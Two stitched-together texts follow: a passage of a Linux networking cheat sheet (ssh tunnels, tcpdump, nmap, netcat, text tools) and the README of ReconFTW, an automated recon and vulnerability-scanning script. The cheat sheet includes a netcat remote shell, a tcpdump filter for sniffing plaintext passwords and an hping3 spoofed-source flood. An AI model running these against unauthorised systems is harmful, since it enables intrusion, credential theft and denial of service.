2: ```bash # Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y # Connect to the service: host1> psql -U db_user -d db_dev -p 9051 -h localhost ``` * `-n` - redirects stdin from `/dev/null` * `-N` - do not execute a remote command * `-T` - disable pseudo-terminal allocation ###### SSH remote port forwarding ```bash # Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y # Connect to the service: host2> psql -U postgres -d postgres -p 8000 -h localhost ``` ___ ##### Tool: [linux-dev](https://www.tldp.org/LDP/abs/html/devref1.html) ###### Testing remote connection to port ```bash timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $? ``` * `<proto` - set protocol (tcp/udp) * `<host>` - set remote host * `<port>` - set destination port ###### Read and write to TCP or UDP sockets with common bash tools ```bash exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&- ``` ___ ##### Tool: [tcpdump](http://www.tcpdump.org/) ###### Filter incoming (on interface) traffic (specific <ip:port>) ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 ``` * `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports) * `-e` - print the link-level headers * `-i [iface|any]` - set interface * `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions) * `host [ip|hostname]` - set host, also `[host not]` * `[and|or]` - set logic * `port [1-65535]` - set port number, also `[port not]` ###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap ``` * `-c [num]` - capture only num number of packets * `-w [filename]` - write packets to file, `-r [filename]` - reading from file ###### Capture all ICMP packets ```bash tcpdump -nei eth0 icmp ``` ###### Check protocol used (TCP or UDP) for service ```bash tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP" ``` ###### Display ASCII text (to parse the output using grep or other) ```bash tcpdump -i eth0 -A -s0 port 443 ``` ###### Grab everything between two keywords ```bash tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p' ``` ###### Grab user and pass ever plain http ```bash tcpdump -i eth0 port http -l -A | egrep -i \ 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \ --color=auto --line-buffered -B20 ``` ###### Extract HTTP User Agent from HTTP request header ```bash tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:" ``` ###### Capture only HTTP GET and POST packets ```bash tcpdump -ei eth0 -s 0 -A -vv \ 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' ``` or simply: ```bash tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:" ``` ###### Rotate capture files ```bash tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200 ``` * `-G <num>` - pcap will be created every `<num>` seconds * `-C <size>` - close the current pcap and open a new one if is larger than `<size>` ###### Top hosts by packets ```bash tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20 ``` ###### Excludes any RFC 1918 private address ```bash tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))' ``` ___ ##### Tool: [tcpick](http://tcpick.sourceforge.net/) ###### Analyse packets in real-time ```bash while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done ``` ___ ##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html) ```bash ngrep -d eth0 "www.domain.com" port 443 ``` * `-d [iface|any]` - set interface * `[domain]` - set hostname * `port [1-65535]` - set port number ```bash ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443 ``` * `(host [ip|hostname])` - filter by ip or hostname * `(port [1-65535])` - filter by port number ```bash ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443 ``` * `-q` - quiet mode (only payloads) * `-t` - added timestamps * `-O [filename]` - save output to file, `-I [filename]` - reading from file ```bash ngrep -d eth0 -qt 'HTTP' 'tcp' ``` * `HTTP` - show http headers * `tcp|udp` - set protocol * `[src|dst] host [ip|hostname]` - set direction for specific node ```bash ngrep -l -q -d eth0 -i "User-Agent: curl*" ``` * `-l` - stdout line buffered * `-i` - case-insensitive search ___ ##### Tool: [hping3](http://www.hping.org/) ```bash hping3 -V -p 80 -s 5050 <scan_type> www.google.com ``` * `-V|--verbose` - verbose mode * `-p|--destport` - set destination port * `-s|--baseport` - set source port * `<scan_type>` - set scan type * `-F|--fin` - set FIN flag, port open if no reply * `-S|--syn` - set SYN flag * `-P|--push` - set PUSH flag * `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open) * `-U|--urg` - set URG flag * `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply * `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply ```bash hping3 -V -c 1 -1 -C 8 www.google.com ``` * `-c [num]` - packet count * `-1` - set ICMP mode * `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8) ```bash hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host> ``` * `--flood` - sent packets as fast as possible (don't show replies) * `--rand-source` - random source address mode * `-d --data` - data size * `-w|--win` - winsize (default 64) ___ ##### Tool: [nmap](https://nmap.org/) ###### Ping scans the network ```bash nmap -sP 192.168.0.0/24 ``` ###### Show only open ports ```bash nmap -F --open 192.168.0.0/24 ``` ###### Full TCP port scan using with service version detection ```bash nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24 ``` ###### Nmap scan and pass output to Nikto ```bash nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h - ``` ###### Recon specific ip:service with Nmap NSE scripts stack ```bash # Set variables: _hosts="192.168.250.10" _ports="80,443" # Set Nmap NSE scripts stack: _nmap_nse_scripts="+dns-brute,\ +http-auth-finder,\ +http-chrono,\ +http-cookie-flags,\ +http-cors,\ +http-cross-domain-policy,\ +http-csrf,\ +http-dombased-xss,\ +http-enum,\ +http-errors,\ +http-git,\ +http-grep,\ +http-internal-ip-disclosure,\ +http-jsonp-detection,\ +http-malware-host,\ +http-methods,\ +http-passwd,\ +http-phpself-xss,\ +http-php-version,\ +http-robots.txt,\ +http-sitemap-generator,\ +http-shellshock,\ +http-stored-xss,\ +http-title,\ +http-unsafe-output-escaping,\ +http-useragent-tester,\ +http-vhosts,\ +http-waf-detect,\ +http-waf-fingerprint,\ +http-xssed,\ +traceroute-geolocation.nse,\ +ssl-enum-ciphers,\ +whois-domain,\ +whois-ip" # Set Nmap NSE script params: _nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true," _nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges," _nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1" # Perform scan: nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts" ``` ___ ##### Tool: [netcat](http://netcat.sourceforge.net/) ```bash nc -kl 5000 ``` * `-l` - listen for an incoming connection * `-k` - listening after client has disconnected * `>filename.out` - save receive data to file (optional) ```bash nc 192.168.0.1 5051 < filename.in ``` * `< filename.in` - send data to remote host ```bash nc -vz 10.240.30.3 5000 ``` * `-v` - verbose output * `-z` - scan for listening daemons ```bash nc -vzu 10.240.30.3 1-65535 ``` * `-u` - scan only udp ports ###### Transfer data file (archive) ```bash server> nc -l 5000 | tar xzvfp - client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000 ``` ###### Launch remote shell ```bash # 1) server> nc -l 5000 -e /bin/bash client> nc 10.240.30.3 5000 # 2) server> rm -f /tmp/f; mkfifo /tmp/f server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f client> nc 10.240.30.3 5000 ``` ###### Simple file server ```bash while true ; do nc -l 5000 | tar -xvf - ; done ``` ###### Simple minimal HTTP Server ```bash while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done ``` ###### Simple HTTP Server > Restarts web server after each request - remove `while` condition for only single connection. ```bash cat > index.html << __EOF__ <!doctype html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <p> Hello! It's a site. </p> </body> </html> __EOF__ ``` ```bash server> while : ; do \ (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \ nc -l -p 5000 \ ; done ``` * `-p` - port number ###### Simple HTTP Proxy (single connection) ```bash #!/usr/bin/env bash if [[ $# != 2 ]] ; then printf "%s\\n" \ "usage: ./nc-proxy listen-port bk_host:bk_port" fi _listen_port="$1" _bk_host=$(echo "$2" | cut -d ":" -f1) _bk_port=$(echo "$2" | cut -d ":" -f2) printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \ "$_listen_port" "$_bk_host" "$_bk_port" _tmp=$(mktemp -d) _back="$_tmp/pipe.back" _sent="$_tmp/pipe.sent" _recv="$_tmp/pipe.recv" trap 'rm -rf "$_tmp"' EXIT mkfifo -m 0600 "$_back" "$_sent" "$_recv" sed "s/^/=> /" <"$_sent" & sed "s/^/<= /" <"$_recv" & nc -l -p "$_listen_port" <"$_back" | \ tee "$_sent" | \ nc "$_bk_host" "$_bk_port" | \ tee "$_recv" >"$_back" ``` ```bash server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000 lport: 8080 bk_host: 192.168.252.10 bk_port: 8000 client> http -p h 10.240.30.3:8080 HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=31536000 Content-Length: 2748 Content-Type: text/html; charset=utf-8 Date: Sun, 01 Jul 2018 20:12:08 GMT Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT ``` ###### Create a single-use TCP or UDP proxy ```bash ### TCP -> TCP nc -l -p 2000 -c "nc [ip|hostname] 3000" ### TCP -> UDP nc -l -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> UDP nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> TCP nc -l -u -p 2000 -c "nc [ip|hostname] 3000" ``` ___ ##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html) ###### Testing connection to remote host (with SNI support) ```bash gnutls-cli -p 443 google.com ``` ###### Testing connection to remote host (without SNI support) ```bash gnutls-cli --disable-sni -p 443 google.com ``` ___ ##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html) ###### Testing remote connection to port ```bash socat - TCP4:10.240.30.3:22 ``` * `-` - standard input (STDIO) * `TCP4:<params>` - set tcp4 connection with specific params * `[hostname|ip]` - set hostname/ip * `[1-65535]` - set port number ###### Redirecting TCP-traffic to a UNIX domain socket under Linux ```bash socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo ``` * `TCP-LISTEN:<params>` - set tcp listen with specific params * `[1-65535]` - set port number * `bind=[hostname|ip]` - set bind hostname/ip * `reuseaddr` - allows other sockets to bind to an address * `fork` - keeps the parent process attempting to produce more connections * `su=nobody` - set user * `range=[ip-range]` - ip range * `UNIX-CLIENT:<params>` - communicates with the specified peer socket * `filename` - define socket ___ ##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/) ###### Set iface in promiscuous mode and dump traffic to the log file ```bash p0f -i enp0s25 -p -d -o /dump/enp0s25.log ``` * `-i` - listen on the specified interface * `-p` - set interface in promiscuous mode * `-d` - fork into background * `-o` - output file ___ ##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat) ###### Graph # of connections for each hosts ```bash netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \ sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }' ``` ###### Monitor open connections for specific port including listen, count and sort it per IP ```bash watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1" ``` ###### Grab banners from local IPv4 listening ports ```bash netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}" ``` ___ ##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync) ###### Rsync remote data as root using sudo ```bash rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/ ``` ___ ##### Tool: [host](https://en.wikipedia.org/wiki/Host_(Unix)) ###### Resolves the domain name (using external dns server) ```bash host google.com 9.9.9.9 ``` ###### Checks the domain administrator (SOA record) ```bash host -t soa google.com 9.9.9.9 ``` ___ ##### Tool: [dig](https://en.wikipedia.org/wiki/Dig_(command)) ###### Resolves the domain name (short output) ```bash dig google.com +short ``` ###### Lookup NS record for specific domain ```bash dig @9.9.9.9 google.com NS ``` ###### Query only answer section ```bash dig google.com +nocomments +noquestion +noauthority +noadditional +nostats ``` ###### Query ALL DNS Records ```bash dig google.com ANY +noall +answer ``` ###### DNS Reverse Look-up ```bash dig -x 172.217.16.14 +short ``` ___ ##### Tool: [certbot](https://certbot.eff.org/) ###### Generate multidomain certificate ```bash certbot certonly -d example.com -d www.example.com ``` ###### Generate wildcard certificate ```bash certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com ``` ###### Generate certificate with 4096 bit private key ```bash certbot certonly -d example.com -d www.example.com --rsa-key-size 4096 ``` ___ ##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other) ###### Get all subnets for specific AS (Autonomous system) ```bash AS="AS32934" whois -h whois.radb.net -- "-i origin ${AS}" | \ grep "^route:" | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]//' | \ sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]/allow /' | \ sed 's/$/;/' | \ sed 's/allow */subnet -> /g' ``` ###### Resolves domain name from dns.google.com with curl and jq ```bash _dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq . ``` ##### Tool: [git](https://git-scm.com/) ###### Log alias for a decent view of your repo ```bash # 1) git log --oneline --decorate --graph --all # 2) git log --graph \ --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \ --abbrev-commit ``` ___ ##### Tool: [python](https://www.python.org/) ###### Static HTTP web server ```bash # Python 3.x python3 -m http.server 8000 --bind 127.0.0.1 # Python 2.x python -m SimpleHTTPServer 8000 ``` ###### Static HTTP web server with SSL support ```bash # Python 3.x from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/to/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() # Python 2.x import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/tp/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() ``` ###### Encode base64 ```bash python -m base64 -e <<< "sample string" ``` ###### Decode base64 ```bash python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg==" ``` ##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html) ###### Search for matching lines ```bash # egrep foo awk '/foo/' filename ``` ###### Search non matching lines ```bash # egrep -v foo awk '!/foo/' filename ``` ###### Print matching lines with numbers ```bash # egrep -n foo awk '/foo/{print FNR,$0}' filename ``` ###### Print the last column ```bash awk '{print $NF}' filename ``` ###### Find all the lines longer than 80 characters ```bash awk 'length($0)>80{print FNR,$0}' filename ``` ###### Print only lines of less than 80 characters ```bash awk 'length < 80 filename ``` ###### Print double new lines a file ```bash awk '1; { print "" }' filename ``` ###### Print line numbers ```bash awk '{ print FNR "\t" $0 }' filename awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner ``` ###### Print line numbers for only non-blank lines ```bash awk 'NF { $0=++a " :" $0 }; { print }' filename ``` ###### Print the line and the next two (i=5) lines after the line matching regexp ```bash awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename ``` ###### Print the lines starting at the line matching 'server {' until the line matching '}' ```bash awk '/server {/,/}/' filename ``` ###### Print multiple columns with separators ```bash awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename ``` ###### Remove empty lines ```bash awk 'NF > 0' filename # alternative: awk NF filename ``` ###### Delete trailing white space (spaces, tabs) ```bash awk '{sub(/[ \t]*$/, "");print}' filename ``` ###### Delete leading white space ```bash awk '{sub(/^[ \t]+/, ""); print}' filename ``` ###### Remove duplicate consecutive lines ```bash # uniq awk 'a !~ $0{print}; {a=$0}' filename ``` ###### Remove duplicate entries in a file without sorting ```bash awk '!x[$0]++' filename ``` ###### Exclude multiple columns ```bash awk '{$1=$3=""}1' filename ``` ###### Substitute foo for bar on lines matching regexp ```bash awk '/regexp/{gsub(/foo/, "bar")};{print}' filename ``` ###### Add some characters at the beginning of matching lines ```bash awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename ``` ###### Get the last hour of Apache logs ```bash awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \ /var/log/httpd/access_log ``` ___ ##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html) ###### Print a specific line from a file ```bash sed -n 10p /path/to/file ``` ###### Remove a specific line from a file ```bash sed -i 10d /path/to/file # alternative (BSD): sed -i'' 10d /path/to/file ``` ###### Remove a range of lines from a file ```bash sed -i <file> -re '<start>,<end>d' ``` ###### Replace newline(s) with a space ```bash sed ':a;N;$!ba;s/\n/ /g' /path/to/file # cross-platform compatible syntax: sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file ``` - `:a` create a label `a` - `N` append the next line to the pattern space - `$!` if not the last line, ba branch (go to) label `a` - `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can) Alternatives: ```bash # perl version (sed-like speed): perl -p -e 's/\n/ /' /path/to/file # bash version (slow): while read line ; do printf "%s" "$line " ; done < file ``` ###### Delete string +N next lines ```bash sed '/start/,+4d' /path/to/file ``` ___ ##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html) ###### Search for a "pattern" inside all files in the current directory ```bash grep -rn "pattern" grep -RnisI "pattern" * fgrep "pattern" * -R ``` ###### Show only for multiple patterns ```bash grep 'INFO*'\''WARN' filename grep 'INFO\|WARN' filename grep -e INFO -e WARN filename grep -E '(INFO|WARN)' filename egrep "INFO|WARN" filename ``` ###### Except multiple patterns ```bash grep -vE '(error|critical|warning)' filename ``` ###### Show data from file without comments ```bash grep -v ^[[:space:]]*# filename ``` ###### Show data from file without comments and new lines ```bash egrep -v '#|^$' filename ``` ###### Show strings with a dash/hyphen ```bash grep -e -- filename grep -- -- filename grep "\-\-" filename ``` ###### Remove blank lines from a file and save output to new file ```bash grep . filename > newfilename ``` ##### Tool: [perl](https://www.perl.org/) ###### Search and replace (in place) ```bash perl -i -pe's/SEARCH/REPLACE/' filename ``` ###### Edit of `*.conf` files changing all foo to bar (and backup original) ```bash perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf ``` ###### Prints the first 20 lines from `*.conf` files ```bash perl -pe 'exit if $. > 20' *.conf ``` ###### Search lines 10 to 20 ```bash perl -ne 'print if 10 .. 20' filename ``` ###### Delete first 10 lines (and backup original) ```bash perl -i.orig -ne 'print unless 1 .. 10' filename ``` ###### Delete all but lines between foo and bar (and backup original) ```bash perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename ``` ###### Reduce multiple blank lines to a single line ```bash perl -p -i -00pe0 filename ``` ###### Convert tabs to spaces (1t = 2sp) ```bash perl -p -i -e 's/\t/ /g' filename ``` ###### Read input from a file and report number of lines and characters ```bash perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename ``` #### Shell functions &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents - [Domain resolve](#domain-resolve) - [Get ASN](#get-asn) ###### Domain resolve ```bash # Dependencies: # - curl # - jq function DomainResolve() { local _host="$1" local _curl_base="curl --request GET" local _timeout="15" _host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \ jq '.Answer[0].data' | tr -d "\"" 2>/dev/null) if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then echo -en "Unsuccessful domain name resolution.\\n" else echo -en "$_host > $_host_ip\\n" fi } ``` Example: ```bash shell> DomainResolve nmap.org nmap.org > 45.33.49.119 shell> DomainResolve nmap.org Unsuccessful domain name resolution. ``` ###### Get ASN ```bash # Dependencies: # - curl function GetASN() { local _ip="$1" local _curl_base="curl --request GET" local _timeout="15" _asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as") _state=$(echo $?) if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then echo -en "Unsuccessful ASN gathering.\\n" else echo -en "$_ip > $_asn\\n" fi } ``` Example: ```bash shell> GetASN 1.1.1.1 1.1.1.1 > AS13335 Cloudflare, Inc. shell> GetASN 0.0.0.0 Unsuccessful ASN gathering. ```
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> ReconFTW <br> </h1> <h4 align="center">A simple bash script for full recon</h4> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v1.0.0"> <img src="https://img.shields.io/badge/release-v1.0.0-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> </p> - [Summary](#summary) - [Installation Instructions](#installation-instructions) - [Usage](#usage) - [Running ReconFTW](#running-reconftw) - [Sample Video](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Mindmap/Workflow](#mindmapworkflow) - [:hourglass: Improvement plan :hourglass:](#hourglass-improvement-plan-hourglass) - [Thanks](#thanks) ## Summary ReconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities. ## Installation Instructions - [Installation Guide](https://github.com/six2dez/reconftw/wiki) :book: - Requires [Golang](https://golang.org/dl/) > 1.14 installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash โ–ถ git clone https://github.com/six2dez/reconftw โ–ถ cd reconftw โ–ถ chmod +x *.sh โ–ถ . ./install.sh โ–ถ ./reconftw.sh -d target.com -a ``` - It is highly recommended, and in some cases essential, to set your API keys or env variables: - amass config file (```~/.config/amass/config.ini```) - subfinder config file (```~/.config/subfinder/config.yaml```) - GitHub tokens file (```~/Tools/.github_tokens```) Recommended > 5, see how to create [here](https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token) - favup API (```shodan init <SHODAN-API-KEY>```) - SSRF Server var (```COLLAB_SERVER``` env var) - Blind XSS Server var (```XSS_SERVER``` env var) - Notify config file (```~/.config/notify/notify.conf```) ## Usage **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Target domain *(example.com)* | | -l | Target list *(one per line)* | | -x | Exclude subdomains list *(Out Of Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -a | Perform full recon | | -s | Full subdomain scan (Subs, tko and probe) | | -w | Perform web checks only without subs (-l required) | | -i | Check whether tools required are present or not | | -v | Verbose/Debug Mode | | -h | Show help section | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan) | | --fs | Full scope (Enable the widest scope * *.domain.* * options) | | -o | Output directory | ## Running ReconFTW **To perform a full recon on single target** *(may take a significant time)* ```bash โ–ถ ./reconftw.sh -d example.com -a ``` **To perfrom a full recon on a list of targets** ```bash โ–ถ ./reconftw.sh -l sites.txt -a -o /output/directory/ ``` **Perform full recon with more intense tasks** *(VPS intended)* ```bash โ–ถ ./reconftw.sh -d example.com -a --deep -o /output/directory/ ``` **Perform a wide scope recon on a target** *(may include false positives)* ```bash โ–ถ ./reconftw.sh -d example.com -a --fs -o /output/directory/ ``` **Check whether all required tools are present or not** ```bash โ–ถ ./reconftw.sh -i ``` **Show help section** ```bash โ–ถ ./reconftw.sh -h ``` ## Sample video ![Video](images/Video.gif) ## :fire: Features :fire: - Google Dorks ([degoogle_hunter](https://github.com/six2dez/degoogle_hunter)) - Multiple subdomain enumeration techniques (passive, bruteforce, permutations and scraping) - Passive ([subfinder](https://github.com/projectdiscovery/subfinder), [assetfinder](https://github.com/tomnomnom/assetfinder), [amass](https://github.com/OWASP/Amass), [findomain](https://github.com/Findomain/Findomain), [crobat](https://github.com/cgboal/sonarsearch), [waybackurls](https://github.com/tomnomnom/waybackurls)) - Certificate transparency ([crtfinder](https://github.com/eslam3kl/crtfinder) and [bufferover](tls.bufferover.run)) - Bruteforce ([shuffledns](https://github.com/projectdiscovery/shuffledns)) - Permutations ([dnsgen](https://github.com/ProjectAnte/dnsgen)) - Subdomain JS Scraping ([JSFinder](https://github.com/Threezh1/JSFinder)) - Sub TKO ([subzy](https://github.com/LukaSikic/subzy) and [nuclei](https://github.com/projectdiscovery/nuclei)) - Web Prober ([httpx](https://github.com/projectdiscovery/httpx)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot)) - Template scanner ([nuclei](https://github.com/projectdiscovery/nuclei)) - Port Scanner ([naabu](https://github.com/projectdiscovery/naabu)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gau](https://github.com/lc/gau), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3)) - Pattern Search ([gf](https://github.com/tomnomnom/waybackurls) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - Param discovery ([paramspider](https://github.com/devanshbatham/ParamSpider) and [arjun](https://github.com/s0md3v/Arjun)) - XSS ([XSStrike](https://github.com/s0md3v/XSStrike)) - Open redirect ([Openredirex](https://github.com/devanshbatham/OpenRedireX)) - SSRF ([asyncio_ssrf.py](https://gist.github.com/h4ms1k/adcc340495d418fcd72ec727a116fea2)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Github ([GitDorker](https://github.com/obheda12/GitDorker)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([LinkFinder](https://github.com/GerbenJavado/LinkFinder), scripts from [JSFScan](https://github.com/KathanP19/JSFScan.sh)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Multithread in some steps ([Interlace](https://github.com/codingo/Interlace)) - Custom output folder (default under Recon/target.tld/) - Run standalone steps (subdomains, subtko, web, gdorks...) - Polished installer compatible with most distros - Verbose mode - Update tools script - Raspberry Pi support - Docker support - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - Out of Scope Support - LFI Checks - Notification support for Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) ## Mindmap/Workflow ![Mindmap](images/mindmap.png) ## :hourglass: Improvement plan :hourglass: These are the next features that would come soon, take a look at all our pending [features](https://github.com/six2dez/reconftw/labels/feature) and feel free to contribute: - [X] Notification support - [ ] HTML Report - [ ] In Scope file support - [ ] ASN/CIDR/Name allowed as target You can support this work buying me a coffee: [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) ## Thanks For their great feedback, support, help or for nothing special but well deserved: - [@detonXX](https://twitter.com/detonXX) - [@cyph3r_asr](https://twitter.com/cyph3r_asr) - [@h4ms1k](https://twitter.com/h4ms1k) - [@Bileltechno](https://twitter.com/BilelEljaamii)
